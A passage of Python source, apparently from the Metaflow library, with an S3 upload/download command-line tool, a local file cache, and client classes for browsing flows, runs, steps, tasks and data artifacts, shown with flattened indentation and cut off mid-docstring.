else:
print(format_triplet(url.prefix, url.url, str(size)))
@cli.command(help='Upload files to S3')
@click.option('--file',
'files',
type=(click.Path(exists=True), str),
multiple=True,
help='Local file->S3Url pair to upload. '
'Can be specified multiple times.')
@click.option('--filelist',
type=click.Path(exists=True),
help='Read local file -> S3 URL mappings from the given file.')
@click.option('--num-workers',
default=NUM_WORKERS_DEFAULT,
show_default=True,
help='Number of concurrent connections.')
@click.option('--verbose/--no-verbose',
default=True,
show_default=True,
help='Print status information on stderr.')
@click.option('--overwrite/--no-overwrite',
default=True,
show_default=True,
help='Overwrite key if it already exists in S3.')
@click.option('--listing/--no-listing',
default=False,
show_default=True,
help='Print S3 URLs upload to on stdout.')
def put(files=None,
filelist=None,
num_workers=None,
verbose=None,
overwrite=True,
listing=None):
def _files():
for local, url in files:
yield url_unquote(local), url_unquote(url)
if filelist:
for line in open(filelist, mode='rb'):
local, url = map(url_unquote, line.split())
if not os.path.exists(local):
exit(ERROR_LOCAL_FILE_NOT_FOUND, local)
yield local, url
def _make_url(local, user_url):
src = urlparse(user_url)
url = S3Url(url=user_url,
bucket=src.netloc,
path=src.path.lstrip('/'),
local=local,
prefix=None)
if src.scheme != 's3':
exit(ERROR_INVALID_URL, url)
if not src.path:
exit(ERROR_NOT_FULL_PATH, url)
return url, os.stat(local).st_size
urls = list(starmap(_make_url, _files()))
if not overwrite:
new_urls = set()
for success, prefix_url, ret in parallel_op(op_get_size, list(list(zip(*urls))[0]), num_workers):
if ret == ERROR_URL_NOT_FOUND:
new_urls.add(prefix_url)
urls = [(url, size) for url, size in urls if url in new_urls]
process_urls('upload', urls, verbose, num_workers)
if listing:
for url, _ in urls:
print(format_triplet(url.url))
def _populate_prefixes(prefixes, inputs):
if not prefixes:
prefixes = []
if inputs:
with open(inputs, mode='rb') as f:
prefixes.extend(l.strip() for l in f)
return list(map(url_unquote, prefixes))
@cli.command(help='Download files from S3')
@click.option('--recursive/--no-recursive',
default=False,
show_default=True,
help='Download prefixes recursively.')
@click.option('--num-workers',
default=NUM_WORKERS_DEFAULT,
show_default=True,
help='Number of concurrent connections.')
@click.option('--inputs',
type=click.Path(exists=True),
help='Read input prefixes from the given file.')
@click.option('--verify/--no-verify',
default=True,
show_default=True,
help='Verify that files were loaded correctly.')
@click.option('--allow-missing/--no-allow-missing',
default=False,
show_default=True,
help='Do not exit if missing files are detected. '\
'Implies --verify.')
@click.option('--verbose/--no-verbose',
default=True,
show_default=True,
help='Print status information on stderr.')
@click.option('--listing/--no-listing',
default=False,
show_default=True,
help='Print S3 URL -> local file mapping on stdout.')
@click.argument('prefixes', nargs=-1)
def get(prefixes,
recursive=None,
num_workers=None,
inputs=None,
verify=None,
allow_missing=None,
verbose=None,
listing=None):
if allow_missing:
verify = True
# Construct a list of URL (prefix) objects
urllist = []
for prefix in _populate_prefixes(prefixes, inputs):
src = urlparse(prefix)
url = S3Url(url=prefix,
bucket=src.netloc,
path=src.path.lstrip('/'),
local=generate_local_path(prefix),
prefix=prefix)
if src.scheme != 's3':
exit(ERROR_INVALID_URL, url)
if not recursive and not src.path:
exit(ERROR_NOT_FULL_PATH, url)
urllist.append(url)
# Construct a url->size mapping
op = None
if recursive:
op = op_list_prefix
elif verify or verbose:
op = op_get_size
if op:
urls = []
# NOTE - we must retain the order of prefixes requested
# and the listing order returned by S3
for success, prefix_url, ret in parallel_op(op, urllist, num_workers):
if success:
urls.extend(ret)
elif ret == ERROR_URL_NOT_FOUND and allow_missing:
urls.append((prefix_url, None))
else:
exit(ret, prefix_url)
else:
# pretend zero size since we don't need it for anything.
# it can't be None though, to make sure the listing below
# works correctly (None denotes a missing file)
urls = [(prefix_url, 0) for prefix_url in urllist]
# exclude the non-existent files from loading
to_load = [(url, size) for url, size in urls if size is not None]
process_urls('download', to_load, verbose, num_workers)
# Postprocess
if verify:
verify_results(to_load, verbose=verbose)
if listing:
for url, size in urls:
if size is None:
print(format_triplet(url.url))
else:
print(format_triplet(url.prefix, url.url, url.local))
if __name__ == '__main__':
from botocore.exceptions import ClientError
    cli(auto_envvar_prefix='S3OP')
from __future__ import print_function
import os
import time
from tempfile import NamedTemporaryFile
from hashlib import sha1
from metaflow.datastore import DATASTORES
from metaflow.exception import MetaflowException
from metaflow.metaflow_config import CLIENT_CACHE_PATH, CLIENT_CACHE_MAX_SIZE
NEW_FILE_QUARANTINE = 10
class FileCacheException(MetaflowException):
headline = 'File cache error'
class FileCache(object):
def __init__(self, cache_dir=None, max_size=None):
self._cache_dir = cache_dir
self._max_size = max_size
if self._cache_dir is None:
self._cache_dir = CLIENT_CACHE_PATH
if self._max_size is None:
self._max_size = int(CLIENT_CACHE_MAX_SIZE)
self._total = 0
self._objects = None
def _index_objects(self):
objects = []
if os.path.exists(self._cache_dir):
for subdir in os.listdir(self._cache_dir):
root = os.path.join(self._cache_dir, subdir)
if os.path.isdir(root):
for obj in os.listdir(root):
if obj.endswith('.cached'):
path = os.path.join(root, obj)
objects.insert(0, (os.path.getctime(path),
os.path.getsize(path),
path))
self._total = sum(size for _, size, _ in objects)
self._objects = sorted(objects, reverse=False)
def _object_path(self, flow_name, run_id, step_name, task_id, name):
token = os.path.join(flow_name, run_id, step_name, task_id, name).encode('utf-8')
sha = sha1(token).hexdigest()
return os.path.join(self._cache_dir, sha[:2], sha + '.cached')
def _garbage_collect(self):
now = time.time()
while self._objects and self._total > self._max_size * 1024**2:
if now - self._objects[0][0] < NEW_FILE_QUARANTINE:
break
ctime, size, path = self._objects.pop(0)
self._total -= size
try:
os.remove(path)
except OSError:
# maybe another client had already GC'ed the file away
pass
def _makedirs(self, path):
# this is for python2 compatibility.
# Python3 has os.makedirs(exist_ok=True).
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def get_log(self, ds_type, logtype, attempt, flow_name, run_id, step_name, task_id):
path = self._object_path(flow_name, run_id, step_name, task_id, '_log%s' % logtype)
def load_func(ds):
return ds.load_log(logtype, attempt_override=attempt)
return self._internal_get_data(
ds_type, flow_name, run_id, step_name, task_id, path, load_func)
def get_data(self, ds_type, flow_name, sha):
path = self._object_path(flow_name, '_', '_', '_', sha)
def load_func(ds):
return ds.load_data(sha)
return self._internal_get_data(
ds_type, flow_name, None, None, None, path, load_func)
def _internal_get_data(self, ds_type, flow_name, run_id, step_name, task_id, path, load_func):
ds_cls = DATASTORES.get(ds_type, None)
if ds_cls is None:
raise FileCacheException('Datastore %s was not found' % ds_type)
if ds_cls.datastore_root is None:
def print_clean(line, **kwargs):
print(line)
ds_cls.datastore_root = ds_cls.get_datastore_root_from_config(
print_clean, create_on_absent=False)
if ds_cls.datastore_root is None:
raise FileCacheException('Cannot locate datastore root')
fileobj = None
if os.path.exists(path):
try:
fileobj = open(path, 'rb')
except IOError:
# maybe another client had already GC'ed the file away
fileobj = None
if fileobj is None:
if self._objects is None:
# index objects lazily at the first request. This can be
# an expensive operation
self._index_objects()
ds = ds_cls(flow_name, run_id, step_name, task_id, mode='d')
dirname = os.path.dirname(path)
try:
self._makedirs(dirname)
except: # noqa E722
raise FileCacheException('Could not create directory: %s' % dirname)
tmpfile = NamedTemporaryFile(dir=dirname, prefix='s3obj', delete=False)
try:
tmpfile.write(load_func(ds))
os.rename(tmpfile.name, path)
except: # noqa E722
os.unlink(tmpfile.name)
raise
size = os.path.getsize(path)
self._total += size
self._objects.append((int(time.time()), size, path))
self._garbage_collect()
fileobj = open(path, 'rb')
        return fileobj
from __future__ import print_function
import time
import tarfile
import json
from collections import namedtuple
from itertools import chain
from metaflow.environment import MetaflowEnvironment
from metaflow.exception import MetaflowNotFound,\
MetaflowNamespaceMismatch,\
MetaflowInternalError
from metaflow.metadata import LocalMetadataProvider, METADATAPROVIDERS
from metaflow.metaflow_config import DEFAULT_METADATA
from metaflow.plugins import ENVIRONMENTS
from metaflow.util import cached_property, resolve_identity
from .filecache import FileCache
try:
# python2
import cPickle as pickle
except: # noqa E722
# python3
import pickle
Metadata = namedtuple('Metadata', ['name',
'value',
'created_at',
'type',
'task'])
filecache = FileCache()
current_namespace = False
current_metadata = False
def metadata(ms):
"""
Switch Metadata provider.
This call has a global effect. Selecting the local metadata will,
for example, not allow access to information stored in remote
metadata providers.
Parameters
----------
ms : string
Can be a path (selects local metadata), a URL starting with http (selects
the service metadata) or an explicit specification <metadata_type>@<info>; as an
example, you can specify local@<path> or service@<url>.
Returns
-------
string
The description of the metadata selected (equivalent to the result of
get_metadata())
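    Example:
        A minimal sketch (the path is a placeholder; this assumes the helper
        is importable from the top-level metaflow package, like get_metadata
        in the tutorials):
            from metaflow import metadata, get_metadata
            metadata('local@/home/me/.metaflow')
            print(get_metadata())   # e.g. 'local@/home/me/.metaflow'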
"""
global current_metadata
infos = ms.split('@', 1)
types = [m.TYPE for m in METADATAPROVIDERS]
if infos[0] in types:
current_metadata = [m for m in METADATAPROVIDERS if m.TYPE == infos[0]][0]
if len(infos) > 1:
current_metadata.INFO = infos[1]
else:
# Deduce from ms; if starts with http, use service or else use local
if ms.startswith('http'):
metadata_type = 'service'
else:
metadata_type = 'local'
res = [m for m in METADATAPROVIDERS if m.TYPE == metadata_type]
if not res:
            print(
                "Cannot find a '%s' metadata provider -- "
                "try specifying one explicitly using <type>@<info>" % metadata_type)
return get_metadata()
current_metadata = res[0]
current_metadata.INFO = ms
return get_metadata()
def get_metadata():
"""
Returns the current Metadata provider.
This call returns the current Metadata being used to return information
about Metaflow objects.
If this is not set explicitly using metadata(), the default value is
determined through environment variables.
Returns
-------
string
Information about the Metadata provider currently selected. This information typically
returns provider specific information (like URL for remote providers or local paths for
local providers).
"""
if current_metadata is False:
default_metadata()
return '%s@%s' % (current_metadata.TYPE, current_metadata.INFO)
def default_metadata():
"""
Resets the Metadata provider to the default value.
The default value of the Metadata provider is determined through a combination of
environment variables.
Returns
-------
string
The result of get_metadata() after resetting the provider.
"""
global current_metadata
default = [m for m in METADATAPROVIDERS if m.TYPE == DEFAULT_METADATA]
if default:
current_metadata = default[0]
else:
current_metadata = LocalMetadataProvider
return get_metadata()
def namespace(ns):
"""
Switch namespace to the one provided.
This call has a global effect. No objects outside this namespace
will be accessible. To access all objects regardless of namespaces,
pass None to this call.
Parameters
----------
ns : string
Namespace to switch to or None to ignore namespaces.
Returns
-------
string
Namespace set (result of get_namespace()).
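    Example:
        A minimal sketch (the user name is a placeholder; this assumes the
        helper is importable from the top-level metaflow package):
            from metaflow import namespace
            namespace('user:alice')   # only objects tagged 'user:alice' are visible
            namespace(None)           # disable namespace filtering entirely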
"""
global current_namespace
current_namespace = ns
return get_namespace()
def get_namespace():
"""
Return the current namespace that is currently being used to filter objects.
The namespace is a tag associated with all objects in Metaflow.
Returns
-------
string or None
The current namespace used to filter objects.
"""
# see a comment about namespace initialization
# in Metaflow.__init__ below
if current_namespace is False:
default_namespace()
return current_namespace
def default_namespace():
"""
Sets or resets the namespace used to filter objects.
The default namespace is in the form 'user:<username>' and is intended to filter
objects belonging to the user.
Returns
-------
string
        The result of get_namespace() after the namespace has been reset to the default.
"""
global current_namespace
current_namespace = resolve_identity()
return get_namespace()
class Metaflow(object):
"""
Entry point to all objects in the Metaflow universe.
This object can be used to list all the flows present either through the explicit property
or by iterating over this object.
Attributes
----------
flows : List of all flows.
Returns the list of all flows. Note that only flows present in the set namespace will
be returned. A flow is present in a namespace if it has at least one run in the
namespace.
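    Example:
        A minimal sketch (this assumes Metaflow is importable from the
        top-level package):
            from metaflow import Metaflow
            for flow in Metaflow():
                print(flow)   # e.g. Flow('PlayListFlow')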
"""
def __init__(self):
# the default namespace is activated lazily at the first object
# invocation or get_namespace(). The other option of activating
# the namespace at the import time is problematic, since there
# may be other modules that alter environment variables etc.
        # which may affect the namespace setting.
if current_namespace is False:
default_namespace()
if current_metadata is False:
default_metadata()
self.metadata = current_metadata
@property
def flows(self):
"""
Returns a list of all the flows present.
Only flows present in the set namespace are returned. A flow is present in a namespace if
it has at least one run that is in the namespace.
Returns
-------
List[Flow]
List of all flows present.
"""
return list(self)
def __iter__(self):
"""
Iterator over all flows present.
Only flows present in the set namespace are returned. A flow is present in a namespace if
it has at least one run that is in the namespace.
Yields
-------
Flow
A Flow present in the Metaflow universe.
"""
# We do not filter on namespace in the request because
# filtering on namespace on flows means finding at least one
# run in this namespace. This is_in_namespace() function
# does this properly in this case
all_flows = self.metadata.get_object('root', 'flow')
all_flows = all_flows if all_flows else []
for flow in all_flows:
try:
v = Flow(_object=flow)
yield v
except MetaflowNamespaceMismatch:
continue
def __str__(self):
return 'Metaflow()'
def __getitem__(self, id):
"""
Returns a specific flow by name.
The flow will only be returned if it is present in the current namespace.
Parameters
----------
id : string
Name of the Flow
Returns
-------
Flow
Flow with the given ID.
"""
return Flow(id)
class MetaflowObject(object):
"""
Base class for all Metaflow objects.
Creates a new object of a specific type (Flow, Run, Step, Task, DataArtifact) given
a path to it (its `pathspec`).
Accessing Metaflow objects is done through one of two methods:
- either by directly instantiating it with this class
- or by accessing it through its parent (iterating over
all children or accessing directly using the [] operator)
With this class, you can:
- Get a `Flow`; use `Flow('FlowName')`.
- Get a `Run` of a flow; use `Run('FlowName/RunID')`.
- Get a `Step` of a run; use `Step('FlowName/RunID/StepName')`.
- Get a `Task` of a step, use `Task('FlowName/RunID/StepName/TaskID')`
- Get a `DataArtifact` of a task; use
`DataArtifact('FlowName/RunID/StepName/TaskID/ArtifactName')`.
Attributes
----------
tags : Set
Tags associated with the object.
created_at : datetime
Date and time this object was first created.
parent : MetaflowObject
Parent of this object. The parent of a `Run` is a `Flow` for example
pathspec : string
Pathspec of this object (for example: 'FlowName/RunID' for a `Run`)
path_components : List[string]
Components of the pathspec
"""
_NAME = 'base'
_CHILD_CLASS = None
def __init__(self,
pathspec=None,
_object=None,
_parent=None,
_namespace_check=True):
self._metaflow = Metaflow()
if pathspec:
ids = pathspec.split('/')
parents = ids[:-1]
self.id = ids[-1]
self._parent = self._create_parents(parents)
self._object = self._get_object(*ids)
else:
self._parent = _parent
self._object = _object
if self._NAME in ('flow', 'task'):
self.id = str(self._object[self._NAME + '_id'])
elif self._NAME == 'run':
self.id = str(self._object['run_number'])
elif self._NAME == 'step':
self.id = str(self._object['step_name'])
elif self._NAME == 'artifact':
self.id = str(self._object['name'])
else:
raise MetaflowInternalError(msg="Unknown type: %s" % self._NAME)
self._created_at = time.strftime(
'%Y-%m-%dT%H:%M:%S.%fZ', time.gmtime(self._object['ts_epoch']//1000))
self._tags = frozenset(chain(self._object.get('system_tags') or [],
self._object.get('tags') or []))
if _namespace_check and not self.is_in_namespace():
raise MetaflowNamespaceMismatch(current_namespace)
def _get_object(self, *path_components):
result = self._metaflow.metadata.get_object(self._NAME, 'self', None, *path_components)
if not result:
raise MetaflowNotFound("%s does not exist" % self)
return result
def _create_parents(self, parents):
if parents:
parent = self._metaflow
for id in parents:
parent = parent[id]
return parent
else:
return None
def __iter__(self):
"""
Iterate over all child objects of this object if any.
Note that only children present in the current namespace are returned.
Returns
-------
Iterator[MetaflowObject]
Iterator over all children
"""
query_filter = {}
if current_namespace:
query_filter = {'any_tags': current_namespace}
unfiltered_children = self._metaflow.metadata.get_object(
self._NAME, self._CHILD_CLASS._NAME, query_filter, *self.path_components)
unfiltered_children = unfiltered_children if unfiltered_children else []
children = filter(
lambda x: self._iter_filter(x),
(self._CHILD_CLASS(_object=obj, _parent=self, _namespace_check=False)
for obj in unfiltered_children))
if children:
return iter(sorted(children, reverse=True, key=lambda x: x.created_at))
else:
return iter([])
def _iter_filter(self, x):
return True
def _filtered_children(self, *tags):
for child in self:
if all(tag in child.tags for tag in tags):
yield child
def is_in_namespace(self):
"""
Returns whether this object is in the current namespace.
If the current namespace is None, this will always return True.
Returns
-------
bool
Whether or not the object is in the current namespace
"""
if self._NAME == 'flow':
return any(True for _ in self)
else:
return current_namespace is None or\
current_namespace in self._tags
def __str__(self):
return "%s('%s')" % (self.__class__.__name__, self.pathspec)
def __repr__(self):
return str(self)
def _get_child(self, id):
result = []
for p in self.path_components:
result.append(p)
result.append(id)
return self._metaflow.metadata.get_object(
self._CHILD_CLASS._NAME, 'self', None, *result)
def __getitem__(self, id):
"""
Returns the child object named 'id'.
Parameters
----------
id : string
Name of the child object
Returns
-------
MetaflowObject
Child object
Raises
------
KeyError
If the name does not identify a valid child object
"""
obj = self._get_child(id)
if obj:
return self._CHILD_CLASS(_object=obj, _parent=self)
else:
raise KeyError(id)
def __contains__(self, id):
"""
Tests whether a child named 'id' exists.
Parameters
----------
id : string
Name of the child object
Returns
-------
bool
True if the child exists or False otherwise
"""
return bool(self._get_child(id))
@property
def tags(self):
"""
Tags associated with this object.
Tags can be user defined or system defined. This returns all tags associated
with the object.
Returns
-------
List[string]
Tags associated with the object
"""
return self._tags
@property
def created_at(self):
"""
Creation time for this object.
        This corresponds to the time the object was first created, which typically means
right before any code is run.
Returns
-------
datetime
Date time of this object's creation.
"""
return self._created_at
@property
def parent(self):
"""
Returns the parent object of this object or None if none exists.
Returns
-------
MetaflowObject
The parent of this object
"""
return self._parent
@property
def pathspec(self):
"""
Returns a string representation uniquely identifying this object.
The string is the same as the one you would pass into the constructor
to build this object.
Returns
-------
string
Unique representation of this object
"""
return '/'.join(self.path_components)
@property
def path_components(self):
"""
List of individual components of the pathspec.
Returns
-------
List[string]
Individual components of the pathspec
"""
def traverse(obj, lst):
lst.insert(0, obj.id)
if obj._parent:
return traverse(obj._parent, lst)
else:
return lst
return traverse(self, [])
class MetaflowData(object):
def __init__(self, artifacts):
self._artifacts = dict((art.id, art) for art in artifacts)
def __getattr__(self, name):
return self._artifacts[name].data
def __contains__(self, var):
return var in self._artifacts
def __str__(self):
return '<MetaflowData: %s>' % ', '.join(self._artifacts)
def __repr__(self):
return str(self)
class MetaflowCode(object):
"""
Describes the code that is occasionally stored with a run.
A code package will contain the version of Metaflow that was used (all the files comprising
the Metaflow library) as well as selected files from the directory containing the Python
file of the FlowSpec.
Attributes
----------
path : string
Location (in the datastore provider) of the code package
info : Dict
Dictionary of information related to this code-package
flowspec : string
Source code of the file containing the FlowSpec in this code package
tarball : TarFile
Tar ball containing all the code
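    Example:
        A minimal sketch (the pathspec is a placeholder; not every run saves
        a code package, in which case `code` is None):
            from metaflow import Run
            code = Run('HelloAWSFlow/3').code
            if code:
                print(code.flowspec)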
"""
def __init__(self, flow_name, code_package):
self._flow_name = flow_name
info = json.loads(code_package)
self._path = info['location']
self._ds_type = info['ds_type']
self._sha = info['sha']
with filecache.get_data(self._ds_type, self._flow_name, self._sha) as f:
self._tar = tarfile.TarFile(fileobj=f)
# The JSON module in Python3 deals with Unicode. Tar gives bytes.
info_str = self._tar.extractfile('INFO').read().decode('utf-8')
self._info = json.loads(info_str)
self._flowspec = self._tar.extractfile(self._info['script']).read()
@property
def path(self):
"""
Location (in the datastore provider) of the code package.
Returns
-------
string
Full path of the code package
"""
return self._path
@property
def info(self):
"""
Metadata associated with the code package.
Returns
-------
Dict
Dictionary of metadata. Keys and values are strings
"""
return self._info
@property
def flowspec(self):
"""
Source code of the Python file containing the FlowSpec.
Returns
-------
string
Content of the Python file
"""
return self._flowspec
@property
def tarball(self):
"""
TarFile for this code package.
Returns
-------
TarFile
TarFile for everything in this code package
"""
return self._tar
def __str__(self):
return '<MetaflowCode: %s>' % self._info['script']
class DataArtifact(MetaflowObject):
"""
A single data artifact and associated metadata.
Attributes
----------
data : object
The unpickled representation of the data contained in this artifact
sha : string
SHA encoding representing the unique identity of this artifact
finished_at : datetime
Alias for created_at
"""
_NAME = 'artifact'
_CHILD_CLASS = None
@property
def data(self):
"""
Unpickled representation of the data contained in this artifact.
Returns
-------
object
Object contained in this artifact
"""
ds_type = self._object['ds_type']
sha = self._object['sha']
with filecache.get_data(ds_type, self.path_components[0], sha) as f:
obj = pickle.load(f)
return obj
# TODO add
# @property
# def size(self)
# TODO add
# @property
# def type(self)
@property
def sha(self):
"""
Unique identifier for this artifact.
This is the SHA1 hash of the artifact.
Returns
-------
string
Hash of this artifact
"""
return self._object['sha']
@property
def finished_at(self):
"""
Creation time for this artifact.
Alias for created_at.
Returns
-------
datetime
Creation time
"""
return self.created_at
class Task(MetaflowObject):
"""
A Task represents an execution of a step.
As such, it contains all data artifacts associated with that execution as well as all metadata
associated with the execution.
Attributes
----------
metadata : List[Metadata]
List of all metadata associated with the task
metadata_dict : Dict
Dictionary where the keys are the names of the metadata and the value are the values
associated with those names
data : MetaflowData
Container of all data artifacts produced by this task
artifacts : MetaflowArtifacts
Container of DataArtifact objects produced by this task
successful : boolean
True if the task successfully completed
finished : boolean
True if the task completed
exception : object
Exception raised by this task if there was one
finished_at : datetime
Time this task finished
runtime_name : string
Runtime this task was executed on
stdout : string
Standard output for the task execution
stderr : string
Standard error output for the task execution
code : MetaflowCode
Code package for this task (if present)
environment_info : Dict
Information about the execution environment (for example Conda)
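    Example:
        A minimal sketch (the pathspec is a placeholder):
            from metaflow import Task
            task = Task('HelloAWSFlow/3/hello/456')
            print(task.successful, task.finished_at)
            print(task.stdout)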
"""
_NAME = 'task'
_CHILD_CLASS = DataArtifact
def __init__(self, *args, **kwargs):
super(Task, self).__init__(*args, **kwargs)
def _iter_filter(self, x):
# exclude private data artifacts
return x.id[0] != '_'
@property
def metadata(self):
"""
Metadata events produced by this task.
Note that Metadata is different from tags.
Returns
-------
List[Metadata]
Metadata produced by this task
"""
all_metadata = self._metaflow.metadata.get_object(
self._NAME, 'metadata', None, *self.path_components)
all_metadata = all_metadata if all_metadata else []
return [Metadata(name=obj.get('field_name'),
value=obj.get('value'),
created_at=obj.get('ts_epoch'),
type=obj.get('type'),
task=self) for obj in all_metadata]
@property
def metadata_dict(self):
"""
Dictionary mapping metadata names (keys) and their associated values.
Note that unlike the metadata() method, this call will only return the latest
metadata for a given name. For example, if a task executes multiple times (retries),
the same metadata name will be generated multiple times (one for each execution of the
task). The metadata() method returns all those metadata elements whereas this call will
return the metadata associated with the latest execution of the task.
Returns
-------
Dict
Dictionary mapping metadata name with value
"""
# use the newest version of each key, hence sorting
return {m.name: m.value
for m in sorted(self.metadata, key=lambda m: m.created_at)}
@property
def index(self):
"""
Returns the index of the innermost foreach loop if this task is run inside at least
one foreach.
The index is what distinguishes the various tasks inside a given step.
This call returns None if this task was not run in a foreach loop.
Returns
-------
int
Index in the innermost loop for this task
"""
try:
return self['_foreach_stack'].data[-1].index
except (KeyError, IndexError):
return None
@property
def data(self):
"""
        Returns a container of data artifacts produced by this task.
You can access data produced by this task as follows:
```
print(task.data.my_var)
```
Returns
-------
MetaflowData
Container of all artifacts produced by this task
"""
return MetaflowData(self)
@property
def artifacts(self):
"""
        Returns a container of DataArtifacts produced by this task.
You can access each DataArtifact by name like so:
```
print(task.artifacts.my_var)
```
This method differs from data() because it returns DataArtifact objects
(which contain additional metadata) as opposed to just the data.
Returns
-------
MetaflowArtifacts
Container of all DataArtifacts produced by this task
"""
arts = list(self)
        obj = namedtuple('MetaflowArtifacts', [art.id for art in arts])
return obj._make(arts)
@property
def successful(self):
"""
Indicates whether or not the task completed successfully.
This information is always about the latest task to have completed (in case
of retries).
Returns
-------
bool
True if the task completed successfully and False otherwise
"""
try:
return self['_success'].data
except KeyError:
return False
@property
def finished(self):
"""
Indicates whether or not the task completed.
This information is always about the latest task to have completed (in case
of retries).
Returns
-------
bool
True if the task completed and False otherwise
"""
try:
return self['_task_ok'].data
except KeyError:
return False
@property
def exception(self):
"""
Returns the exception that caused the task to fail, if any.
This information is always about the latest task to have completed (in case
of retries). If successful() returns False and finished() returns True,
this method can help determine what went wrong.
Returns
-------
object
Exception raised by the task or None if not applicable
"""
try:
return self['_exception'].data
except KeyError:
return None
@property
def finished_at(self):
"""
Returns the datetime object of when the task finished (successfully or not).
This information is always about the latest task to have completed (in case
of retries). This call will return None if the task is not finished.
Returns
-------
datetime
Datetime of when the task finished
"""
try:
return self['_task_ok'].created_at
except KeyError:
return None
@property
def runtime_name(self):
"""
Returns the name of the runtime this task executed on.
Returns
-------
string
Name of the runtime this task executed on
"""
for t in self._tags:
if t.startswith('runtime:'):
return t.split(':')[1]
return None
@property
def stdout(self):
"""
Returns the full standard out of this task.
This information relates to the latest task that completed (in case of retries). In other
words, this does not return the realtime logs of execution.
Returns
-------
string
Standard output of this task
"""
logtype = 'stdout'
return self._load_log(logtype)
@property
def stderr(self):
"""
Returns the full standard error of this task.
This information relates to the latest task that completed (in case of retries). In other
words, this does not return the realtime logs of execution.
Returns
-------
string
Standard error of this task
"""
logtype = 'stderr'
return self._load_log(logtype)
@cached_property
def code(self):
"""
Returns the MetaflowCode object for this task, if present.
Not all tasks save their code so this call may return None in those cases.
Returns
-------
MetaflowCode
Code package for this task
"""
code_package = self.metadata_dict.get('code-package')
if code_package:
return MetaflowCode(self.path_components[0], code_package)
return None
@cached_property
def environment_info(self):
"""
Returns information about the environment that was used to execute this task. As an
example, if the Conda environment is selected, this will return information about the
dependencies that were used in the environment.
This environment information is only available for tasks that have a code package.
Returns
-------
Dict
Dictionary describing the environment
"""
my_code = self.code
if not my_code:
return None
env_type = my_code.info['environment_type']
if not env_type:
return None
env = [m for m in ENVIRONMENTS + [MetaflowEnvironment] if m.TYPE == env_type][0]
return env.get_client_info(self.path_components[0], self.metadata_dict)
def _load_log(self, logtype, as_unicode=True):
ret_val = None
log_info = self.metadata_dict.get('log_location_%s' % logtype)
if log_info:
log_info = json.loads(log_info)
ds_type = log_info['ds_type']
attempt = log_info['attempt']
components = self.path_components
with filecache.get_log(ds_type, logtype, int(attempt), *components) as f:
ret_val = f.read()
if as_unicode and (ret_val is not None):
return ret_val.decode(encoding='utf8')
else:
return ret_val
class Step(MetaflowObject):
"""
A Step represents a user-defined Step (a method annotated with the @step decorator).
As such, it contains all Tasks associated with the step (ie: all executions of the
Step). A linear Step will have only one associated task whereas a foreach Step will have
multiple Tasks.
Attributes
----------
task : Task
Returns a Task object from the step
finished_at : datetime
Time this step finished (time of completion of the last task)
environment_info : Dict
Information about the execution environment (for example Conda)
"""
_NAME = 'step'
_CHILD_CLASS = Task
@property
def task(self):
"""
Returns a Task object belonging to this step.
This is useful when the step only contains one task (a linear step for example).
Returns
-------
Task
A task in the step
"""
for t in self:
return t
def tasks(self, *tags):
"""
Returns an iterator over all the tasks in the step.
An optional filter is available that allows you to filter on tags. The
tasks returned if the filter is specified will contain all the tags
specified.
Parameters
----------
tags : string
Tags to match
Returns
-------
Iterator[Task]
Iterator over Task objects in this step
"""
return self._filtered_children(*tags)
@property
def finished_at(self):
"""
Returns the datetime object of when the step finished (successfully or not).
A step is considered finished when all the tasks that belong to it have
finished. This call will return None if the step has not finished
Returns
-------
datetime
Datetime of when the step finished
"""
try:
return max(task.finished_at for task in self)
except TypeError:
# Raised if None is present in max
return None
@property
def environment_info(self):
"""
Returns information about the environment that was used to execute this step. As an
example, if the Conda environment is selected, this will return information about the
dependencies that were used in the environment.
This environment information is only available for steps that have tasks
for which the code package has been saved.
Returns
-------
Dict
Dictionary describing the environment
"""
# All tasks have the same environment info so just use the first one
for t in self:
return t.environment_info
class Run(MetaflowObject):
"""
A Run represents an execution of a Flow
As such, it contains all Steps associated with the flow.
Attributes
----------
data : MetaflowData
Container of all data artifacts produced by this run
successful : boolean
True if the run successfully completed
finished : boolean
True if the run completed
finished_at : datetime
Time this run finished
code : MetaflowCode
Code package for this run (if present)
end_task : Task
Task for the end step (if it is present already)
"""
_NAME = 'run'
_CHILD_CLASS = Step
def _iter_filter(self, x):
# exclude _parameters step
return x.id[0] != '_'
def steps(self, *tags):
"""
Returns an iterator over all the steps in the run.
An optional filter is available that allows you to filter on tags. The
steps returned if the filter is specified will contain all the tags
specified.
Parameters
----------
tags : string
Tags to match
Returns
-------
Iterator[Step]
Iterator over Step objects in this run
"""
return self._filtered_children(*tags)
@property
def code(self):
"""
Returns the MetaflowCode object for this run, if present.
Not all runs save their code so this call may return None in those cases.
Returns
-------
MetaflowCode
Code package for this run
"""
if 'start' in self:
return self['start'].task.code
@property
def data(self):
"""
        Returns a container of data artifacts produced by this run.
You can access data produced by this run as follows:
```
print(run.data.my_var)
```
This is a shorthand for `run['end'].task.data`. If the 'end' step has not yet
executed, returns None.
Returns
-------
MetaflowData
Container of all artifacts produced by this task
"""
end = self.end_task
if end:
return end.data
@property
def successful(self):
"""
Indicates whether or not the run completed successfully.
A run is successful if its 'end' step is successful.
Returns
-------
bool
True if the run completed successfully and False otherwise
"""
end = self.end_task
if end:
return end.successful
else:
return False
@property
def finished(self):
"""
Indicates whether or not the run completed.
A run completed if its 'end' step completed.
Returns
-------
bool
True if the run completed and False otherwise
"""
end = self.end_task
if end:
return end.finished
else:
return False
@property
def finished_at(self):
"""
Returns the datetime object of when the run finished (successfully or not).
The completion time of a run is the same as the completion time of its 'end' step.
If the 'end' step has not completed, returns None.
Returns
-------
datetime
Datetime of when the run finished
"""
end = self.end_task
if end:
return end.finished_at
@property
def end_task(self):
"""
Returns the Task corresponding to the 'end' step.
This returns None if the end step does not yet exist.
Returns
-------
Task
The 'end' task
"""
try:
end_step = self['end']
except KeyError:
return None
return end_step.task
class Flow(MetaflowObject):
"""
A Flow represents all existing flows with a certain name, in other words,
classes derived from 'FlowSpec'
As such, it contains all Runs (executions of a flow) related to this flow.
Attributes
----------
latest_run : Run
Latest Run (in progress or completed, successfully or not) of this Flow
latest_successful_run : Run
Latest successfully completed Run of this Flow
"""
_NAME = 'flow'
_CHILD_CLASS = Run
def __init__(self, *args, **kwargs):
super(Flow, self).__init__(*args, **kwargs)
@property
def latest_run(self):
"""
Returns the latest run (either in progress or completed) of this flow.
Note that an in-progress run may be returned by this call. Use latest_successful_run
to get an object representing a completed successful run.
Returns
-------
Run
Latest run of this flow
"""
for run in self:
return run
@property
def latest_successful_run(self):
"""
